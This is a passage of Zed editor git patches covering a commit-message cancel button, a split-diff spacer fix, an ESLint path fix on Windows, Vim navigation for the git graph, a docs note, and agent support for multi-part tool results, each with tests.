ContextMenu, ElevationIndex, IndentGuideColors, - PopoverMenu, RenderedIndentGuide, ScrollAxes, Scrollbars, SplitButton, Tooltip, WithScrollbar, + ButtonLike, Checkbox, ContextMenu, ElevationIndex, IndentGuideColors, PopoverMenu, + RenderedIndentGuide, ScrollAxes, Scrollbars, SplitButton, TintColor, Tooltip, WithScrollbar, prelude::*, }; use util::paths::PathStyle; @@ -4063,10 +4063,15 @@ impl GitPanel { h_flex() .gap_1() .child( - Icon::new(IconName::ArrowCircle) - .size(IconSize::XSmall) - .color(Color::Info) - .with_rotate_animation(2), + IconButton::new("cancel-generate-commit-message", IconName::Stop) + .icon_color(Color::Error) + .icon_size(IconSize::Small) + .style(ButtonStyle::Tinted(TintColor::Error)) + .tooltip(Tooltip::text("Cancel Commit Message Generation")) + .on_click(cx.listener(|this, _event, _window, cx| { + this.generate_commit_message_task.take(); + cx.notify(); + })), ) 
.child( Label::new("Generating Commit…") From 4e511094c0a3f39e9b1a01736eac1bd88fb30a38 Mon Sep 17 00:00:00 2001 From: Tim Vermeulen Date: Mon, 27 Apr 2026 12:10:48 +0200 Subject: [PATCH 053/231] editor: Fix split diff spacer calculation for non-row-aligned patch groups (#53098) Fixes a bug in the split diff spacer calculation when a patch group starts mid-row, sometimes causing extra spacers to be inserted. `spacer_blocks` already explicitly handles the case where `first_point` isn't at the start of `edit_for_first_point.old`, but the `while let Some(source_point) = source_points.next()` loop that follows implicitly assumes that `source_point` is at the start of `current_range`, which in turn seems to be based on the assumption that `current_range` starts at the beginning of a row. As it turns out, `current_range` isn't guaranteed to start at the beginning of a row, which can sometimes lead to incorrect spacer blocks being inserted. This addresses that by moving the existing `if edit_for_first_point.old.start < first_point` logic into the loop body as `if current_edit.old.start < current_boundary` in order to handle any non-row-aligned patch groups, not just the first one. Here's an example of how this bug could manifest: https://github.com/user-attachments/assets/1d3a5b4c-e4ad-4d87-804b-c4390d25f408 After: https://github.com/user-attachments/assets/b15acc62-33fe-4154-82e5-5cdf1806ffa7 Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed incorrect spacer blocks sometimes appearing in the split diff view when editing the file. 
--- crates/editor/src/display_map/block_map.rs | 71 +++++++------ crates/editor/src/split.rs | 115 +++++++++++++++++++++ 2 files changed, 150 insertions(+), 36 deletions(-) diff --git a/crates/editor/src/display_map/block_map.rs b/crates/editor/src/display_map/block_map.rs index 45469ab6cf1fea..c3dbfa4f6dd6d8 100644 --- a/crates/editor/src/display_map/block_map.rs +++ b/crates/editor/src/display_map/block_map.rs @@ -1368,50 +1368,49 @@ impl BlockMap { let mut delta = their_baseline.0 as i32 - our_baseline.0 as i32; - // If we started out in the middle of a hunk/group, work up to the end of that group to set up the main loop below. - if edit_for_first_point.old.start < first_point { - let mut current_boundary = first_point; - let current_range = edit_for_first_point.new; - while let Some(next_point) = source_points.peek().cloned() { - let edit_for_next_point = excerpt.patch.edit_for_old_position(next_point); - if edit_for_next_point.new.end > current_range.end { - break; - } - source_points.next(); - current_boundary = next_point; - } - - let (new_delta, spacer) = determine_spacer( - &mut our_wrapper, - &mut companion_wrapper, - current_boundary, - current_range.end.min(excerpt.target_excerpt_range.end), - delta, - Bias::Left, - ); - - delta = new_delta; - if let Some((wrap_row, height)) = spacer { - result.push(( - BlockPlacement::Above(wrap_row), - Block::Spacer { - id: SpacerId(self.next_block_id.fetch_add(1, SeqCst)), - height, - is_below: false, - }, - )); - } - } - while let Some(source_point) = source_points.next() { let mut current_boundary = source_point; - let current_range = excerpt.patch.edit_for_old_position(current_boundary).new; + let current_edit = excerpt.patch.edit_for_old_position(current_boundary); + let current_range = current_edit.new; if current_boundary.column > 0 { debug_assert_eq!(current_boundary, excerpt.source_excerpt_range.end); break; } + if current_edit.old.start < current_boundary { + while let Some(next_point) = 
source_points.peek().copied() { + let edit_for_next_point = excerpt.patch.edit_for_old_position(next_point); + if edit_for_next_point.new.end > current_range.end { + break; + } + current_boundary = next_point; + source_points.next(); + } + + let (new_delta, spacer) = determine_spacer( + &mut our_wrapper, + &mut companion_wrapper, + current_boundary, + current_range.end.min(excerpt.target_excerpt_range.end), + delta, + Bias::Left, + ); + + delta = new_delta; + if let Some((wrap_row, height)) = spacer { + result.push(( + BlockPlacement::Above(wrap_row), + Block::Spacer { + id: SpacerId(self.next_block_id.fetch_add(1, SeqCst)), + height, + is_below: false, + }, + )); + } + continue; + } + let (delta_at_start, mut spacer_at_start) = determine_spacer( &mut our_wrapper, &mut companion_wrapper, diff --git a/crates/editor/src/split.rs b/crates/editor/src/split.rs index 347383d0171b8d..42f485a236b40c 100644 --- a/crates/editor/src/split.rs +++ b/crates/editor/src/split.rs @@ -6062,6 +6062,121 @@ mod tests { cx.run_until_parked(); } + #[gpui::test] + async fn test_spacer_blocks_revert_after_temporary_edit(cx: &mut gpui::TestAppContext) { + use rope::Point; + use unindent::Unindent as _; + + let (editor, mut cx) = init_test(cx, SoftWrap::EditorWidth, DiffViewStyle::Split).await; + + let base_text = " + aaa + bbb + " + .unindent(); + let current_text = " + aaa + bbb + ccc + " + .unindent(); + + let (buffer, diff) = buffer_with_diff(&base_text, ¤t_text, &mut cx); + + editor.update(cx, |editor, cx| { + let path = PathKey::for_buffer(&buffer, cx); + editor.update_excerpts_for_path( + path, + buffer.clone(), + vec![Point::new(0, 0)..buffer.read(cx).max_point()], + 0, + diff.clone(), + cx, + ); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + bbb + § spacer" + .unindent(), + &mut cx, + ); + + let buffer_snapshot = buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(0, 
3)..Point::new(0, 3), "\n")], None, cx); + buffer.text_snapshot() + }); + diff.update(cx, |diff, cx| { + diff.recalculate_diff_sync(&buffer_snapshot, cx); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + § spacer + bbb + § spacer" + .unindent(), + &mut cx, + ); + + let buffer_snapshot = buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(0, 3)..Point::new(1, 0), "")], None, cx); + buffer.text_snapshot() + }); + diff.update(cx, |diff, cx| { + diff.recalculate_diff_sync(&buffer_snapshot, cx); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + bbb + § spacer" + .unindent(), + &mut cx, + ); + } + #[gpui::test] async fn test_act_as_type(cx: &mut gpui::TestAppContext) { let (splittable_editor, cx) = init_test(cx, SoftWrap::None, DiffViewStyle::Split).await; From 5b9125dd3d91200e73c324a7cc9d572366100540 Mon Sep 17 00:00:00 2001 From: Tristan Phease Date: Mon, 27 Apr 2026 23:10:58 +1200 Subject: [PATCH 054/231] Fix ESLint not starting on Windows (#54945) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54093 (at least the os error 123 in the comments of that bug)/#54901 (although the diagnosis in that bug is totally wrong) Used process monitor to work out what that issue was: image There's actually a '\n' after node_modules there so it's an invalid directory. Add trim() to fix. 
After adding that change locally, eslint loaded fine Release Notes: - Fixed bug where eslint didn't start on Windows --- crates/project/src/lsp_store.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 483f1252c4d10b..13d1cd90f47762 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -14502,7 +14502,7 @@ impl LspAdapterDelegate for LocalLspAdapterDelegate { .output() .await?; let global_node_modules = - PathBuf::from(String::from_utf8_lossy(&output.stdout).to_string()); + PathBuf::from(String::from_utf8_lossy(&output.stdout).trim().to_string()); if let Some(version) = read_package_installed_version(global_node_modules.clone(), package_name).await? From 4c92205a0b30c322a41e9e2633be956aab2b2902 Mon Sep 17 00:00:00 2001 From: Nihal Kumar Date: Mon, 27 Apr 2026 16:44:33 +0530 Subject: [PATCH 055/231] git_graph: Wire up Vim mode navigation (#53609) Added Vim mode navigation (`j`, `k`, `gg`, `G`) to the Git Graph view. 
[gitgraph-vim.webm](https://github.com/user-attachments/assets/b2dd31a5-deb0-48ab-a48d-8721ee500dad) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #53525 Release Notes: - Added vim mode navigation to git graph --------- Co-authored-by: Anthony Eid --- assets/keymaps/vim.json | 9 ++ crates/git_graph/src/git_graph.rs | 140 ++++++++++++++++++++++++++++++ 2 files changed, 149 insertions(+) diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 4d93761eaeab0e..188ea2e483a65d 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1033,6 +1033,15 @@ "enter": "menu::Cancel", }, }, + { + "context": "GitGraph", + "bindings": { + "j": "vim::MenuSelectNext", + "k": "vim::MenuSelectPrevious", + "shift-g": "menu::SelectLast", + "g g": "menu::SelectFirst" + } + }, { "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 6d3d99ee2a98aa..a69da25daa9018 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -5072,4 +5072,144 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_git_graph_navigation(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + serde_json::json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let mut rng = StdRng::seed_from_u64(42); + let commits = generate_random_commit_dag(&mut rng, 10, false); + fs.set_graph_commits(Path::new("/project/.git"), commits); + + let project = Project::test(fs.clone(), [Path::new("/project")], 
cx).await; + cx.run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + cx.run_until_parked(); + + git_graph.update_in(cx, |graph, window, cx| { + graph.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); + cx.run_until_parked(); + + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.graph_data.commits.len(), 10); + }); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, None); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_first(&menu::SelectFirst, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(1)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_last(&menu::SelectLast, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + 
assert_eq!(graph.selected_entry_idx, Some(9)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(9)); + }); + + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(8)); + }); + + git_graph.update(cx, |graph, cx| { + graph.selected_entry_idx = None; + cx.notify(); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { + graph.select_prev(&menu::SelectPrevious, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + + git_graph.update(cx, |graph, cx| { + graph.selected_entry_idx = None; + cx.notify(); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { + graph.select_next(&menu::SelectNext, window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + } } From 149d40b48d5f9f49c43bb7a856c13fec4f1df523 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 13:38:33 +0200 Subject: [PATCH 056/231] docs: Prompt extension authors to test their extension before publishing (#54998) Release Notes: - N/A --- docs/src/extensions/developing-extensions.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/src/extensions/developing-extensions.md b/docs/src/extensions/developing-extensions.md index 01c16dc62be8b9..7a52a4dc6606a7 100644 --- a/docs/src/extensions/developing-extensions.md +++ b/docs/src/extensions/developing-extensions.md @@ -162,6 +162,8 @@ Note that non-compliance will be raised during the publishing process by reviewe ## Publishing your extension +> Prior to publishing your extension, you should have 
installed as well as tested it locally thoroughly. Note that untested extension submissions where the extension is not functioning at all will be closed eagerly without further feedback. + To publish an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions). In your PR, do the following: From cc0f953393957729e686f95788de2b0082577c9a Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 27 Apr 2026 14:36:11 +0200 Subject: [PATCH 057/231] agent: Allow tools to output multiple content parts (#54518) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- crates/agent/src/db.rs | 2 +- crates/agent/src/edit_agent/evals.rs | 2 +- .../agent/src/tests/edit_file_thread_test.rs | 5 +- crates/agent/src/tests/mod.rs | 178 ++++++++++++++--- crates/agent/src/thread.rs | 80 +++++--- .../src/tools/context_server_registry.rs | 12 +- .../src/tools/evals/streaming_edit_file.rs | 2 +- crates/anthropic/src/completion.rs | 45 +++-- crates/google_ai/src/completion.rs | 53 ++--- crates/language_model/src/fake_provider.rs | 8 +- crates/language_model_core/src/request.rs | 185 ++++++++++++++++-- .../language_models/src/provider/bedrock.rs | 12 +- .../src/provider/copilot_chat.rs | 97 +++++---- .../language_models/src/provider/deepseek.rs | 25 ++- .../language_models/src/provider/lmstudio.rs | 34 ++-- .../language_models/src/provider/mistral.rs | 17 +- crates/language_models/src/provider/ollama.rs | 2 +- .../src/provider/open_router.rs | 28 +-- crates/open_ai/src/completion.rs | 61 +++--- 19 files changed, 620 insertions(+), 228 deletions(-) diff --git 
a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 0ed03ed51703b0..a34290742ad59a 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -261,7 +261,7 @@ impl DbThread { tool_use_id: tool_result.tool_use_id, tool_name: name.into(), is_error: tool_result.is_error, - content: tool_result.content, + content: vec![tool_result.content], output: tool_result.output, }, ); diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index c1c2886f84e0aa..7e4f314afd0db2 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -1156,7 +1156,7 @@ fn tool_result( tool_use_id: LanguageModelToolUseId::from(id.into()), tool_name: name.into(), is_error: false, - content: LanguageModelToolResultContent::Text(result.into()), + content: vec![LanguageModelToolResultContent::Text(result.into())], output: None, }) } diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index b5ce6441e790e0..3efd7753740bc8 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -387,10 +387,7 @@ async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( "Tool result should succeed, got: {:?}", tool_result ); - let content_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(t) => t.to_string(), - other => panic!("Expected text content, got: {:?}", other), - }; + let content_text = tool_result.text_contents(); assert!( !content_text.contains("file has been modified since you last read it"), "Did not expect a stale last-read error, got: {content_text}" diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index f8d74e0df95e53..996e753952b6cb 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -494,7 +494,9 @@ async fn test_system_prompt(cx: &mut TestAppContext) { 
assert_eq!(pending_completion.messages[0].role, Role::System); let system_message = &pending_completion.messages[0]; - let system_prompt = system_message.content[0].to_str().unwrap(); + let MessageContent::Text(system_prompt) = &system_message.content[0] else { + panic!("Expected text content"); + }; assert!( system_prompt.contains("test-shell"), "unexpected system message: {:?}", @@ -530,7 +532,9 @@ async fn test_system_prompt_without_tools(cx: &mut TestAppContext) { assert_eq!(pending_completion.messages[0].role, Role::System); let system_message = &pending_completion.messages[0]; - let system_prompt = system_message.content[0].to_str().unwrap(); + let MessageContent::Text(system_prompt) = &system_message.content[0] else { + panic!("Expected text content"); + }; assert!( !system_prompt.contains("## Tool Use"), "unexpected system message: {:?}", @@ -637,7 +641,7 @@ async fn test_prompt_caching(cx: &mut TestAppContext) { tool_use_id: "tool_1".into(), tool_name: EchoTool::NAME.into(), is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()), }; assert_eq!( @@ -866,14 +870,14 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: tool_call_auth_1.tool_call.tool_call_id.0.to_string().into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) }), language_model::MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: tool_call_auth_2.tool_call.tool_call_id.0.to_string().into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: true, - content: "Permission to run tool denied by user".into(), + content: vec!["Permission to run tool denied by user".into()], output: Some("Permission to run tool denied by user".into()) }) ] @@ -912,7 +916,7 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: tool_call_auth_3.tool_call.tool_call_id.0.to_string().into(), 
tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) } )] @@ -940,7 +944,7 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { tool_use_id: "tool_id_4".into(), tool_name: ToolRequiringPermission::NAME.into(), is_error: false, - content: "Allowed".into(), + content: vec!["Allowed".into()], output: Some("Allowed".into()) } )] @@ -1562,14 +1566,14 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { tool_use_id: "tool_3".into(), tool_name: "echo".into(), is_error: false, - content: "native".into(), + content: vec!["native".into()], output: Some("native".into()), },), MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: "tool_2".into(), tool_name: "test_server_echo".into(), is_error: false, - content: "mcp".into(), + content: vec!["mcp".into()], output: Some("mcp".into()), },), ] @@ -1578,6 +1582,126 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { events.collect::>().await; } +#[gpui::test] +async fn test_mcp_tool_multi_content_response(cx: &mut TestAppContext) { + let ThreadTest { + model, + thread, + context_server_store, + fs, + .. 
+ } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + fake_model.set_supports_images(true); + + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "tool_permissions": { "default": "allow" }, + "profiles": { + "test": { + "name": "Test Profile", + "enable_all_context_servers": true, + "tools": {} + }, + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("test".into()), cx) + }); + + let mut mcp_tool_calls = setup_context_server( + "screenshot_server", + vec![context_server::types::Tool { + name: "screenshot".into(), + description: None, + input_schema: json!({"type": "object", "properties": {}}), + output_schema: None, + annotations: None, + }], + &context_server_store, + cx, + ); + + let events = thread.update(cx, |thread, cx| { + thread + .send(UserMessageId::new(), ["Take a screenshot"], cx) + .unwrap() + }); + cx.run_until_parked(); + + let completion = fake_model.pending_completions().pop().unwrap(); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "screenshot".into(), + raw_input: json!({}).to_string(), + input: json!({}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + let _ = completion; + + let (tool_call_params, tool_call_response) = mcp_tool_calls.next().await.unwrap(); + assert_eq!(tool_call_params.name, "screenshot"); + tool_call_response + .send(context_server::types::CallToolResponse { + content: vec![ + context_server::types::ToolResponseContent::Text { + text: "Some text".into(), + }, + context_server::types::ToolResponseContent::Image { + data: "aGVsbG8=".into(), + mime_type: "image/png".into(), + }, + context_server::types::ToolResponseContent::Text { + text: "Some more text".into(), + }, + ], + is_error: None, + meta: None, + 
structured_content: None, + }) + .unwrap(); + cx.run_until_parked(); + + // Verify the tool result round-trips back to the model as a multi-part Vec. + let completion = fake_model.pending_completions().pop().unwrap(); + let tool_result = completion + .messages + .last() + .unwrap() + .content + .iter() + .find_map(|c| match c { + MessageContent::ToolResult(r) => Some(r.clone()), + _ => None, + }) + .expect("expected a tool result"); + assert_eq!(tool_result.tool_use_id, "tool_1".into()); + assert_eq!(tool_result.content.len(), 2); + assert_eq!( + tool_result.content[0], + language_model::LanguageModelToolResultContent::Text(Arc::from("Some text")) + ); + assert_eq!( + tool_result.content[1], + language_model::LanguageModelToolResultContent::Text(Arc::from("Some more text")) + ); + fake_model.end_last_completion_stream(); + events.collect::>().await; +} + #[gpui::test] async fn test_mcp_tool_result_displayed_when_server_disconnected(cx: &mut TestAppContext) { let ThreadTest { @@ -2106,10 +2230,7 @@ async fn test_terminal_tool_cancellation_captures_output(cx: &mut TestAppContext .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); // "partial output" comes from FakeTerminalHandle's output field assert!( @@ -2571,10 +2692,7 @@ async fn test_terminal_tool_stopped_via_terminal_card_button(cx: &mut TestAppCon .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); assert!( result_text.contains("The user stopped this command"), @@ -2666,10 +2784,7 @@ async fn test_terminal_tool_timeout_expires(cx: &mut 
TestAppContext) { .get(&tool_use.id) .expect("expected tool result"); - let result_text = match &tool_result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - _ => panic!("expected text content in tool result"), - }; + let result_text = tool_result.text_contents(); assert!( result_text.contains("timed out"), @@ -3290,7 +3405,7 @@ async fn test_building_request_with_pending_tools(cx: &mut TestAppContext) { tool_use_id: echo_tool_use.id.clone(), tool_name: echo_tool_use.name, is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()) })], cache: false, @@ -3776,7 +3891,7 @@ async fn test_send_retry_finishes_tool_calls_on_error(cx: &mut TestAppContext) { tool_use_id: tool_use_1.id.clone(), tool_name: tool_use_1.name.clone(), is_error: false, - content: "test".into(), + content: vec!["test".into()], output: Some("test".into()) } )], @@ -3936,8 +4051,10 @@ async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: "Failed to receive tool input: tool input was not fully received" - .into(), + content: vec![ + "Failed to receive tool input: tool input was not fully received" + .into(), + ], output: Some( "Failed to receive tool input: tool input was not fully received" .into() @@ -4044,10 +4161,7 @@ async fn test_streaming_tool_json_parse_error_is_forwarded_to_running_tool( let result = tool_results[0]; assert!(result.is_error); - let content_text = match &result.content { - language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), - other => panic!("Expected text content, got {:?}", other), - }; + let content_text = result.text_contents(); assert!( content_text.contains("Saw partial text 'partial' before invalid JSON"), "Expected tool-enriched partial context, got: {content_text}" @@ -7069,7 +7183,7 @@ async fn 
test_streaming_tool_error_breaks_stream_loop_immediately(cx: &mut TestA tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: "failed".into(), + content: vec!["failed".into()], output: Some("failed".into()), } )], @@ -7180,14 +7294,14 @@ async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut Te tool_use_id: second_tool_use.id.clone(), tool_name: second_tool_use.name, is_error: true, - content: "failed".into(), + content: vec!["failed".into()], output: Some("failed".into()), }), language_model::MessageContent::ToolResult(LanguageModelToolResult { tool_use_id: first_tool_use.id.clone(), tool_name: first_tool_use.name, is_error: false, - content: "hello world".into(), + content: vec!["hello world".into()], output: Some("hello world".into()), }), ], diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 89b3b0eb25190b..2a8a6a5b3cb290 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -518,12 +518,14 @@ impl AgentMessage { markdown.push_str("**ERROR:**\n"); } - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - writeln!(markdown, "{text}\n").ok(); - } - LanguageModelToolResultContent::Image(_) => { - writeln!(markdown, "\n").ok(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + writeln!(markdown, "{text}\n").ok(); + } + LanguageModelToolResultContent::Image(_) => { + writeln!(markdown, "\n").ok(); + } } } @@ -588,8 +590,8 @@ impl AgentMessage { let mut tool_result = tool_result.clone(); // Surprisingly, the API fails if we return an empty string here. // It thinks we are sending a tool use without a tool result. 
- if tool_result.content.is_empty() { - tool_result.content = "".into(); + if tool_result.is_content_empty() { + tool_result.content = vec!["".into()]; } user_message .content @@ -2332,7 +2334,7 @@ impl Thread { let Some(tool) = tool else { let content = format!("No tool named {} exists", tool_use.name); return Some(Task::ready(LanguageModelToolResult { - content: LanguageModelToolResultContent::Text(Arc::from(content)), + content: vec![LanguageModelToolResultContent::Text(Arc::from(content))], tool_use_id: tool_use.id, tool_name: tool_use.name, is_error: true, @@ -2418,13 +2420,39 @@ impl Thread { cx.foreground_executor().spawn(async move { let (is_error, output) = match tool_result.await { Ok(mut output) => { - if let LanguageModelToolResultContent::Image(_) = &output.llm_output - && !supports_images - { - output = AgentToolOutput::from_error( - "Attempted to read an image, but this model doesn't support it.", - ); - (true, output) + let contains_image = output + .llm_output + .iter() + .any(|part| matches!(part, LanguageModelToolResultContent::Image(_))); + if contains_image && !supports_images { + // Replace each image part with an inline placeholder so + // any accompanying text is still presented to the model. + // If there's nothing else in the output, surface an error + // to match the pre-multi-part behavior for image-only + // tool results. 
+ let placeholder = LanguageModelToolResultContent::Text(Arc::from( + "[Tool responded with an image, but this model doesn't support images]", + )); + let has_non_image = output + .llm_output + .iter() + .any(|part| !matches!(part, LanguageModelToolResultContent::Image(_))); + if has_non_image { + output.llm_output = output + .llm_output + .into_iter() + .map(|part| match part { + LanguageModelToolResultContent::Image(_) => placeholder.clone(), + other => other, + }) + .collect(); + (false, output) + } else { + let output = AgentToolOutput::from_error( + "Attempted to read an image, but this model doesn't support it.", + ); + (true, output) + } } else { (false, output) } @@ -2472,7 +2500,7 @@ impl Thread { let Some(tool) = tool else { let content = format!("No tool named {} exists", tool_use.name); return Some(Task::ready(LanguageModelToolResult { - content: LanguageModelToolResultContent::Text(Arc::from(content)), + content: vec![LanguageModelToolResultContent::Text(Arc::from(content))], tool_use_id: tool_use.id, tool_name: tool_use.name, is_error: true, @@ -2743,7 +2771,9 @@ impl Thread { tool_use_id: tool_use.id.clone(), tool_name: tool_use.name.clone(), is_error: true, - content: LanguageModelToolResultContent::Text(TOOL_CANCELED_MESSAGE.into()), + content: vec![LanguageModelToolResultContent::Text( + TOOL_CANCELED_MESSAGE.into(), + )], output: None, }, ); @@ -3392,14 +3422,16 @@ where pub struct Erased(T); pub struct AgentToolOutput { - pub llm_output: LanguageModelToolResultContent, + pub llm_output: Vec, pub raw_output: serde_json::Value, } impl AgentToolOutput { pub fn from_error(message: impl Into) -> Self { let message = message.into(); - let llm_output = LanguageModelToolResultContent::Text(Arc::from(message.as_str())); + let llm_output = 